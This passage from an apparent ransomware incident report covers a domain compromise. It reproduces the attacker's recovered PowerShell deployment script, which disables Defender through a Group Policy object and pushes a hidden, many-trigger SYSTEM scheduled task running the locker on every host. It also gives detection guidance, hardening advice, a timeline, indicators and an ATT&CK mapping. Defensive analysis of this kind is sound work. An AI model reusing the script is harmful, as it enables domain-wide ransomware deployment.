&lt;li&gt;The payload keeps running after the threat actor logs out, due to the Group Policy object and the local task staging the ransomware from NETLOGON on every Group Policy refresh, and on this network the payload ran again from NETLOGON in waves after the last operator session closed.&lt;/li&gt;
&lt;li&gt;Removing the ransomware requires deleting the Group Policy object, the NETLOGON binary, and the local scheduled task and Run keys on every host, due to the hourly repeat and the session triggers running the ransomware again against restored or newly written data until all of it is gone.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The eleven triggers recovered from the task XML run the payload at startup, at logon, on idle, when the task registers, on every remote and console connect and disconnect, and on every session lock and unlock, each one set to repeat hourly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Triggers&amp;gt;
  &amp;lt;CalendarTrigger/&amp;gt;       daily
  &amp;lt;LogonTrigger/&amp;gt;          at logon
  &amp;lt;BootTrigger/&amp;gt;           at startup
  &amp;lt;IdleTrigger/&amp;gt;           on idle
  &amp;lt;RegistrationTrigger/&amp;gt;   when the task registers
  six SessionStateChangeTrigger:
    RemoteConnect      on RDP connect
    ConsoleConnect     on console connect
    RemoteDisconnect   on RDP disconnect
    ConsoleDisconnect  on console disconnect
    SessionLock        on session lock
    SessionUnlock      on session unlock
&amp;lt;/Triggers&amp;gt;

all eleven triggers repeat hourly (PT1H over P1D)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the hosts that kept &lt;strong&gt;Tamper Protection&lt;/strong&gt; on the disable the GPO pushed was blocked and Microsoft Defender logged Event 5013, so real time protection stayed on and Microsoft Defender quarantined the payload from NETLOGON and the SystemUpdate scheduled task and removed them again on every Group Policy refresh. The standing task fired on every trigger on those hosts, so Microsoft Defender detected the payload and logged Event 1116, and Tamper Protection kept real time protection on so the payload was blocked and the hosts were not encrypted.&lt;/p&gt;
&lt;p&gt;Below is the recovered builder, &lt;code&gt;deploy_gpo.ps1&lt;/code&gt;, from the domain controller PowerShell logs. The launch password is redacted and the repetitive scheduled task XML is trimmed for length.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Write-Host &quot;[+] Installing required modules...&quot;
try { Import-Module ServerManager -ErrorAction Stop } catch {}
try { Add-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
try { Install-WindowsFeature RSAT-AD-PowerShell -ErrorAction SilentlyContinue } catch {}
Import-Module ActiveDirectory -ErrorAction SilentlyContinue
Import-Module GroupPolicy -ErrorAction SilentlyContinue

Write-Host &quot;[+] Getting domain info...&quot;
try {
    $Domain = (Get-ADDomain).DNSRoot
    $DomainDN = (Get-ADDomain).DistinguishedName
    Write-Host &quot;[+] Domain from AD: $Domain&quot;
} catch {
    try {
        $Domain = (Get-WmiObject Win32_ComputerSystem).Domain
        $DomainDN = &quot;DC=&quot; + ($Domain -replace &apos;\.&apos;,&apos;,DC=&apos;)
        Write-Host &quot;[+] Domain from WMI: $Domain&quot;
    } catch {
        $Domain = $env:USERDNSDOMAIN
        $DomainDN = &quot;DC=&quot; + ($Domain -replace &apos;\.&apos;,&apos;,DC=&apos;)
        Write-Host &quot;[+] Domain from env: $Domain&quot;
    }
}

Write-Host &quot;[+] Copying locker to SYSVOL scripts...&quot;
$LocalPath = &quot;\\$Domain\NETLOGON\G_9w5ey0_windows_amd64.exe&quot;
$ExeArgs = &quot;--password [redacted]&quot;
Copy-Item -Path &quot;C:\Users\veeam-backup\Downloads\G_9w5ey0_windows_amd64.exe&quot; -Destination $LocalPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $LocalPath -Name IsReadOnly -Value $true -ErrorAction SilentlyContinue

Write-Host &quot;[+] Creating GPO &apos;WindowsG&apos;...&quot;
New-GPO -Name &quot;WindowsG&quot; -Comment &quot;System Update&quot; -ErrorAction SilentlyContinue | Out-Null
New-GPLink -Name &quot;WindowsG&quot; -Target $DomainDN -ErrorAction SilentlyContinue | Out-Null
New-GPLink -Name &quot;WindowsG&quot; -Target &quot;OU=Domain Controllers,$DomainDN&quot; -ErrorAction SilentlyContinue | Out-Null
Write-Host &quot;[+] Disabling Windows Defender...&quot;
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; -ValueName &quot;DisableAntiSpyware&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; -ValueName &quot;DisableRoutinelyTakingAction&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; -ValueName &quot;DisableRealtimeMonitoring&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; -ValueName &quot;DisableBehaviorMonitoring&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; -ValueName &quot;DisableOnAccessProtection&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection&quot; -ValueName &quot;DisableIOAVProtection&quot; -Type DWord -Value 1 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Spynet&quot; -ValueName &quot;SpynetReporting&quot; -Type DWord -Value 0 -ErrorAction SilentlyContinue | Out-Null
Set-GPRegistryValue -Name &quot;WindowsG&quot; -Key &quot;HKLM\Software\Policies\Microsoft\Windows Defender\Spynet&quot; -ValueName &quot;SubmitSamplesConsent&quot; -Type DWord -Value 2 -ErrorAction SilentlyContinue | Out-Null

Write-Host &quot;[+] Creating XML file...&quot;
$TaskName = &quot;SystemUpdate&quot;
$TaskGuid = &quot;{44115BBF-9445-7A25-4F28-E697FB7DEB85}&quot;
$TaskDate = &quot;2026-05-31 05:25:02&quot;
$StartBoundary = &quot;2026-05-30T05:25:02&quot;
$TaskXmlPath = &quot;$env:TEMP\ScheduledTasks.xml&quot;

$xmlContent = @&apos;
&amp;lt;ScheduledTasks clsid=&quot;{CC63F200-7309-4ba0-B154-A71CD118DBCC}&quot;&amp;gt;
&amp;lt;TaskV2 clsid=&quot;{D8896631-B747-47a7-84A6-C155337F3BC8}&quot; name=&quot;TASKNAME_PLACEHOLDER&quot; changed=&quot;TASKDATE_PLACEHOLDER&quot; uid=&quot;TASKGUID_PLACEHOLDER&quot;&amp;gt;
&amp;lt;Properties action=&quot;C&quot; name=&quot;TASKNAME_PLACEHOLDER&quot; runAs=&quot;NT AUTHORITY\System&quot; logonType=&quot;S4U&quot;&amp;gt;
&amp;lt;Task version=&quot;1.3&quot;&amp;gt;
&amp;lt;Principals&amp;gt;&amp;lt;Principal id=&quot;Author&quot;&amp;gt;&amp;lt;UserId&amp;gt;NT AUTHORITY\System&amp;lt;/UserId&amp;gt;&amp;lt;LogonType&amp;gt;S4U&amp;lt;/LogonType&amp;gt;&amp;lt;RunLevel&amp;gt;HighestAvailable&amp;lt;/RunLevel&amp;gt;&amp;lt;/Principal&amp;gt;&amp;lt;/Principals&amp;gt;
&amp;lt;Settings&amp;gt;&amp;lt;Hidden&amp;gt;true&amp;lt;/Hidden&amp;gt;&amp;lt;WakeToRun&amp;gt;true&amp;lt;/WakeToRun&amp;gt;&amp;lt;ExecutionTimeLimit&amp;gt;PT0S&amp;lt;/ExecutionTimeLimit&amp;gt;&amp;lt;Priority&amp;gt;7&amp;lt;/Priority&amp;gt;&amp;lt;StartWhenAvailable&amp;gt;true&amp;lt;/StartWhenAvailable&amp;gt;&amp;lt;MultipleInstancesPolicy&amp;gt;IgnoreNew&amp;lt;/MultipleInstancesPolicy&amp;gt;&amp;lt;/Settings&amp;gt;
&amp;lt;Triggers&amp;gt;
&amp;lt;CalendarTrigger&amp;gt;&amp;lt;StartBoundary&amp;gt;STARTBOUNDARY_PLACEHOLDER&amp;lt;/StartBoundary&amp;gt;&amp;lt;ScheduleByDay&amp;gt;&amp;lt;DaysInterval&amp;gt;1&amp;lt;/DaysInterval&amp;gt;&amp;lt;/ScheduleByDay&amp;gt;&amp;lt;Repetition&amp;gt;&amp;lt;Interval&amp;gt;PT1H&amp;lt;/Interval&amp;gt;&amp;lt;Duration&amp;gt;P1D&amp;lt;/Duration&amp;gt;&amp;lt;/Repetition&amp;gt;&amp;lt;/CalendarTrigger&amp;gt;
&amp;lt;LogonTrigger/&amp;gt;&amp;lt;BootTrigger/&amp;gt;&amp;lt;IdleTrigger/&amp;gt;&amp;lt;RegistrationTrigger/&amp;gt;
&amp;lt;!-- each trigger repeats hourly; plus six SessionStateChangeTrigger: RemoteConnect, ConsoleConnect, RemoteDisconnect, ConsoleDisconnect, SessionLock, SessionUnlock --&amp;gt;
&amp;lt;/Triggers&amp;gt;
&amp;lt;Actions Context=&quot;Author&quot;&amp;gt;&amp;lt;Exec&amp;gt;&amp;lt;Command&amp;gt;LOCALPATH_PLACEHOLDER&amp;lt;/Command&amp;gt;&amp;lt;Arguments&amp;gt;EXEARGS_PLACEHOLDER&amp;lt;/Arguments&amp;gt;&amp;lt;/Exec&amp;gt;&amp;lt;/Actions&amp;gt;
&amp;lt;/Task&amp;gt;
&amp;lt;/Properties&amp;gt;
&amp;lt;/TaskV2&amp;gt;
&amp;lt;/ScheduledTasks&amp;gt;
&apos;@

$xmlContent = $xmlContent -replace &apos;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt;\n&apos;,&apos;&apos;
$xmlContent = $xmlContent -replace &apos;TASKNAME_PLACEHOLDER&apos;,$TaskName
$xmlContent = $xmlContent -replace &apos;TASKDATE_PLACEHOLDER&apos;,$TaskDate
$xmlContent = $xmlContent -replace &apos;TASKGUID_PLACEHOLDER&apos;,$TaskGuid
$xmlContent = $xmlContent -replace &apos;STARTBOUNDARY_PLACEHOLDER&apos;,$StartBoundary
$xmlContent = $xmlContent -replace &apos;LOCALPATH_PLACEHOLDER&apos;,$LocalPath
$xmlContent = $xmlContent -replace &apos;EXEARGS_PLACEHOLDER&apos;,$ExeArgs

$utf8NoBOM = New-Object System.Text.UTF8Encoding $false
[System.IO.File]::WriteAllText($TaskXmlPath, $xmlContent, $utf8NoBOM)

Write-Host &quot;[+] Deploying task to GPO...&quot;
$gpo = Get-GPO -Name &quot;WindowsG&quot;
$guid = $gpo.Id.Guid
$GpoScheduledPath = &quot;\\$Domain\SYSVOL\$Domain\Policies\{$guid}\Machine\Preferences\ScheduledTasks&quot;

if (!(Test-Path $GpoScheduledPath)) {
    New-Item -ItemType Directory -Path $GpoScheduledPath -Force | Out-Null
}

Copy-Item -Path $TaskXmlPath -Destination &quot;$GpoScheduledPath\ScheduledTasks.xml&quot; -Force

Write-Host &quot;[+] Updating GPO versions (AD + SYSVOL)...&quot;
$gptPath = &quot;\\$Domain\SYSVOL\$Domain\Policies\{$guid}\GPT.INI&quot;
$gptContent = Get-Content $gptPath -Raw
$gptContent = $gptContent -replace &apos;Version=\d+&apos;,&apos;Version=65536&apos;
Set-Content -Path $gptPath -Value $gptContent -Force

Set-GPPrefRegistryValue -Name &quot;WindowsG&quot; -Context Computer -Action Create -Key &quot;HKLM\\Software\\GPOVersionUpdate&quot; -ValueName &quot;Trigger&quot; -Value 1 -Type DWord -ErrorAction SilentlyContinue | Out-Null
Remove-GPPrefRegistryValue -Name &quot;WindowsG&quot; -Context Computer -Key &quot;HKLM\\Software\\GPOVersionUpdate&quot; -ValueName &quot;Trigger&quot; -ErrorAction SilentlyContinue | Out-Null

Write-Host &quot;[+] Registering CSE for Scheduled Tasks...&quot;
$gpoADPath = &quot;CN={$guid},CN=Policies,CN=System,$DomainDN&quot;
Set-ADObject -Identity $gpoADPath -Replace @{gPCMachineExtensionNames=&quot;[redacted]&quot;} -ErrorAction SilentlyContinue

Write-Host &quot;[+] Forcing GPO update on all computers...&quot;
try {
    $compgpoupd = Get-ADComputer -Filter *
    $compgpoupd | ForEach-Object -Process {
        Invoke-GPUpdate -Computer $_.name -RandomDelayInMinutes 0 -Force -ErrorAction SilentlyContinue
    }
} catch {
    $comps = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name
    foreach ($comp in $comps) {
        Invoke-Command -ComputerName $comp -ScriptBlock { gpupdate /force } -ErrorAction SilentlyContinue
    }
}

Write-Host &quot;[+] GPO deployment complete!&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Detection and Hunting&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Scheduled task with an unusual number of triggers.&lt;/strong&gt; In the task XML logged by Security &lt;code&gt;4698&lt;/code&gt; and &lt;code&gt;4702&lt;/code&gt;, count the triggers and flag any task with more than 5. These events are not logged until you &lt;a href=&quot;https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol-set&quot;&gt;turn on the Audit Other Object Access Events subcategory&lt;/a&gt;, which is off by default.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ESC1, a certificate issued for a subject the requester does not own.&lt;/strong&gt; AD CS records the request and issue as Security &lt;code&gt;4886&lt;/code&gt; and &lt;code&gt;4887&lt;/code&gt;, but neither is written until you &lt;a href=&quot;https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786432%28v=ws.11%29#configuring-microsoft-windows-audit-policy&quot;&gt;enable CA auditing&lt;/a&gt;, which is not on by default. Flag any certificate whose subject alternative name does not match the account that requested it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certipy reconnaissance over LDAP.&lt;/strong&gt; Directory service &lt;code&gt;1644&lt;/code&gt; logs the LDAP searches &lt;code&gt;certipy find&lt;/code&gt; runs, &lt;code&gt;(objectClass=pKICertificateTemplate)&lt;/code&gt;, &lt;code&gt;( &amp;amp;  (objectClass=pKIEnrollmentService) )&lt;/code&gt;, and &lt;code&gt;(objectClass=msPKI-Enterprise-Oid)&lt;/code&gt;. &lt;a href=&quot;https://learn.microsoft.com/en-us/troubleshoot/windows-server/active-directory/event1644reader-analyze-ldap-query-performance&quot;&gt;1644&lt;/a&gt; stays off until you set &lt;code&gt;15 Field Engineering&lt;/code&gt; to 5 and the Expensive, Inefficient, and Search Time thresholds to 1 on domain controllers, which is what takes it from logging slow queries to recording every search.&lt;/p&gt;
&lt;h3&gt;Hardening&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Audit your own AD CS with Certipy.&lt;/strong&gt; Run &lt;code&gt;certipy find -vulnerable -stdout&lt;/code&gt;, or PSPKIAudit and Locksmith, to find any misconfigured AD CS templates.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Take VPN authentication off directory and local passwords.&lt;/strong&gt; Move the SSL VPN to an identity provider over SAML or OIDC, require MFA, and remove both the LDAP bind and the local firewall accounts.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Day 1&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;14:22&lt;/td&gt;
&lt;td&gt;SSL VPN credential spray from 45.74.59[.]0/24, password Spring2026, 153,455 failures across 115,535 usernames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18:48&lt;/td&gt;
&lt;td&gt;matched credential validated at the SSL VPN portal from 45.74.59[.]54, disconnect after 17 seconds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18:53&lt;/td&gt;
&lt;td&gt;SSL VPN session opened from 158.94.211[.]14&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18:53&lt;/td&gt;
&lt;td&gt;TCP SYN scan across the subnet over 445, 88, 389, 636, 135, 53, 9401&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18:55&lt;/td&gt;
&lt;td&gt;LDAP enumeration against the domain controller&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;18:56&lt;/td&gt;
&lt;td&gt;credential validation against every host in the domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:35&lt;/td&gt;
&lt;td&gt;further LDAP enumeration, AD CS enrollment service surfaced&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:37&lt;/td&gt;
&lt;td&gt;ESC1 certificate request, SAN upn=administrator, certificate issued&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:39&lt;/td&gt;
&lt;td&gt;PKINIT logon as Administrator, UnPAC the hash recovers the NT hash&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:40&lt;/td&gt;
&lt;td&gt;DCSync, 110 plus replication operations in 22 seconds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:45&lt;/td&gt;
&lt;td&gt;pass the hash as Administrator over NTLM&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:46&lt;/td&gt;
&lt;td&gt;veeam-backup created and added to Domain Admins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:48&lt;/td&gt;
&lt;td&gt;RDP into the domain controller as veeam-backup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:49&lt;/td&gt;
&lt;td&gt;RDP into the backup server as veeam-backup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:51&lt;/td&gt;
&lt;td&gt;Microsoft Defender real time protection disabled on the backup server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20:51&lt;/td&gt;
&lt;td&gt;DecryptVeeamEncryptedPasswords run against the Veeam configuration database&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;21:24&lt;/td&gt;
&lt;td&gt;Admin2 created and added to local Administrators on the backup server&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Day 2&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;08:57&lt;/td&gt;
&lt;td&gt;Veeam decryptor rerun on the backup server via wmiexec, svc.backup credentials recovered&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:29&lt;/td&gt;
&lt;td&gt;authentication test across all hosts as the backup service account&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:30&lt;/td&gt;
&lt;td&gt;NetExec write access test against ADMIN$, C$, IPC$ on every host in the domain&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;08:58 to 14:41&lt;/td&gt;
&lt;td&gt;failed root and veeam-backup SSH attempts against the file server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12:24&lt;/td&gt;
&lt;td&gt;network drives mapped to the file shares&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12:32&lt;/td&gt;
&lt;td&gt;first rclone exfiltration attempt to waso, pixeldrain, failed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14:33&lt;/td&gt;
&lt;td&gt;RDP into the domain controller, the session the exfiltration runs under&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15:01 to 16:01&lt;/td&gt;
&lt;td&gt;file shares exfiltrated over SFTP to 91.92.242[.]32 through wabo&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16:06&lt;/td&gt;
&lt;td&gt;Advanced IP Scanner and systeminfo&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Day 3&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;08:13&lt;/td&gt;
&lt;td&gt;RDP into the domain controller, victim data review over SMB&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:15 to 09:20&lt;/td&gt;
&lt;td&gt;failed root SSH attempts against the mail server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:21&lt;/td&gt;
&lt;td&gt;Group Policy Management console opened&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:24&lt;/td&gt;
&lt;td&gt;payload staged, run in Group Policy mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:25&lt;/td&gt;
&lt;td&gt;payload copied to NETLOGON, Defender exclusions added, Security log cleared, note dropped on the domain controller&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:25&lt;/td&gt;
&lt;td&gt;Microsoft Defender blocks the payload on the protected workstations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;09:30&lt;/td&gt;
&lt;td&gt;real time protection disabled on a host that had Tamper Protection off&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11:01&lt;/td&gt;
&lt;td&gt;payload exclusions added, Security log cleared, and the workstation encrypted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22:01 to 23:26&lt;/td&gt;
&lt;td&gt;autonomous ONSTART payload waves re fire as hosts reboot&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;Indicators&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Network&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Indicator&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;45.74.59[.]0/24&lt;/td&gt;
&lt;td&gt;SSL VPN credential spray source, password Spring2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;45.74.59[.]54&lt;/td&gt;
&lt;td&gt;SSL VPN credential validation source, matched account&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;158.94.211[.]14&lt;/td&gt;
&lt;td&gt;SSL VPN session source, early recon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;91.92.242[.]32&lt;/td&gt;
&lt;td&gt;SSL VPN session source, SFTP exfiltration endpoint over 22&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;91.92.243[.]17&lt;/td&gt;
&lt;td&gt;SSL VPN session source, backup server pivot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;91.92.243[.]151&lt;/td&gt;
&lt;td&gt;SSL VPN session source, hostname WIN-8H6JMQBVGP2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;http://pixeldrain.com&quot;&gt;pixeldrain.com&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;failed exfiltration destination&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Files&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Artifact&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;G_9w5ey0_windows_amd64.exe&lt;/td&gt;
&lt;td&gt;SHA256 4DE88220FF6A6DCB137B17D8D3F77AB4BACC39EA4E4D1147F687B021B7A82B8C&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DecryptVeeamEncryptedPasswords.ps1&lt;/td&gt;
&lt;td&gt;Veeam credential decryptor, SHA256 ae6ab7507086b2f59f587144f6b7257340c08b0d3d27cf9e578538c5be173fff&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;README-GENTLEMEN.txt&lt;/td&gt;
&lt;td&gt;Ransom note&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DecryptVeeamEncryptedPasswords&lt;/td&gt;
&lt;td&gt;Veeam credential decryptor&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Accounts created by the threat actor&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Account&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;veeam-backup&lt;/td&gt;
&lt;td&gt;Domain Admin&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Admin2&lt;/td&gt;
&lt;td&gt;local Administrator, password L0ckb1t38217&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Actor&lt;/strong&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Alias&lt;/td&gt;
&lt;td&gt;AlexSupp (assessed ex DragonForce and LockBit affiliate)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Group&lt;/td&gt;
&lt;td&gt;The Gentlemen ransomware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tox ID (shared, Gentle admin)&lt;/td&gt;
&lt;td&gt;A4DCA91E7CF7DBBF29250281BE720F0DE793540BFC93611C41797B6BA76E12678185602470FC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Leak site&lt;/td&gt;
&lt;td&gt;tezwsse5czllksjb7cwp65rvnk4oobmzti2znn42i43bjdfd2prqqkad[.]onion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;X account&lt;/td&gt;
&lt;td&gt;&lt;a href=&quot;http://x.com/TheGentlemen26&quot;&gt;x.com/TheGentlemen26&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;MITRE ATT&amp;amp;CK&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Evidence&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Initial Access&lt;/td&gt;
&lt;td&gt;T1110.003 Password Spraying&lt;/td&gt;
&lt;td&gt;SSL VPN spray, password Spring2026, 115,535 usernames&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Initial Access&lt;/td&gt;
&lt;td&gt;T1078 Valid Accounts&lt;/td&gt;
&lt;td&gt;SSL VPN with the valid credential&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reconnaissance&lt;/td&gt;
&lt;td&gt;T1046 Network Service Discovery&lt;/td&gt;
&lt;td&gt;TCP SYN scan over 445, 88, 389, 636, 135, 53, 9401&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Discovery&lt;/td&gt;
&lt;td&gt;T1018 Remote System Discovery&lt;/td&gt;
&lt;td&gt;LDAP enumeration, Advanced IP Scanner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege Escalation&lt;/td&gt;
&lt;td&gt;T1649 Steal or Forge Certificates&lt;/td&gt;
&lt;td&gt;AD CS ESC1, certificate for Administrator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Access&lt;/td&gt;
&lt;td&gt;T1003.006 DCSync&lt;/td&gt;
&lt;td&gt;directory replication of all hashes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Access&lt;/td&gt;
&lt;td&gt;T1555 Credentials from Password Stores&lt;/td&gt;
&lt;td&gt;Veeam configuration database decryption&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;T1136.002 Create Account&lt;/td&gt;
